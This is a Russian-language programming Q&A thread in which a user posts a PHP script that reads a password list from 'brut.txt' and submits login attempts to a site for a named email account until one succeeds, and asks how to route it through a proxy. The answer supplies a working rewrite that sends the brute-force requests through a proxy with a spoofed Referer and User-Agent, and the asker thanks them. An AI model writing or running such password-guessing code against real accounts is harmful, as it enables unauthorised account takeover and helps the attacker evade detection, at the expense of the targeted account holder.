# Прокси и авторизация

Tags: php

Всем привет! :)
Вот собственно код:

```
<?php
$file = file($_SERVER['DOCUMENT_ROOT'].'/brut.txt');
foreach ($file as $password) {

    // открываем сокет на хост www.site.ru
    $fp = fsockopen('www.site.ru', 80, $errno, $errstr, 3000);

    // Проверяем успешность установки соединения
    if (!$fp) {
        echo $errstr.$errno; // вывод ошибки
    }
    else {
        // переменные
        $data = 'do=login&Submit=submit&username=ekimoff_sd@mail.ru&password='.$password;

        // заголовки
        $headers  = "POST /login.php HTTP/1.1\r\n"; // POST-запрос для login.php
        $headers .= "Host: www.site.ru\r\n";
        $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1\r\n";
        $headers .= "Referer: http://www.site.ru\r\n"; // подделка Referer
        $headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $headers .= "Content-Length: ".strlen($data)."\n\n";
        $headers .= $data."\n\n";

        // отправляем HTTP-запрос серверу
        fwrite($fp, $headers);

        // получаем ответ
        $line = '';
        while (!feof($fp)) {
            $line .= fgets($fp, 1024);
        }

        unset($headers);
        fclose($fp);

        if (!strstr($line,'password=deleted')) {
            echo 'password: '.$password;
            break;
        }
    }
}
?>
```

Как к данному скрипту можно прикрутить прокси (`ip:port`). Помогите, пожалуйста :(

Answer (score 1):

Конкретно данный пример модифицировать для работы через proxy-сервер получится не слишком хорошо, но можно переписать:

```
<?php

function post_request ( $post = array(), $proxy ) {
    $headers = array(
        'Content-type: application/x-www-form-urlencoded',
        'Referer: http://www.site.ru',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'
    );

    return file_get_contents(
        'http://www.site.ru/login.php',
        false,
        stream_context_create(
            array( 'http' => array(
                        'method'          => 'POST',
                        'header'          => implode("\r\n", $headers ),
                        'content'         => http_build_query( $post ),
                        'proxy'            => $proxy,
                        'request_fulluri' => true
            ) )
        )
    );
}

$file = file($_SERVER['DOCUMENT_ROOT'].'/brut.txt');
foreach ( $file as $password ) {
    $line = post_request(
        array(
            'do'       => 'login',
            'Submit'   => 'submit',
            'username' => 'ekimoff_sd@mail.ru',
            'password' => $password
        ),
        'tcp://proxy.sample.tld:3128'
    );

        if (!strstr($line,'password=deleted')) {
            echo 'password: '.$password;
            break;
        }
}
```

Тут в скрипте есть несколько неточностей, для лучшего понимания и исправления онных прочтите документацию:

- [HTTP context options](http://php.net/manual/en/context.http.php)
- [Context options and parameters](http://www.php.net/manual/en/context.php)
- [Proxy server](http://en.wikipedia.org/wiki/Proxy_server)

Comment: Спасибо огромное!!!

Comment: @JavaBitz, не забудьте принять ответ.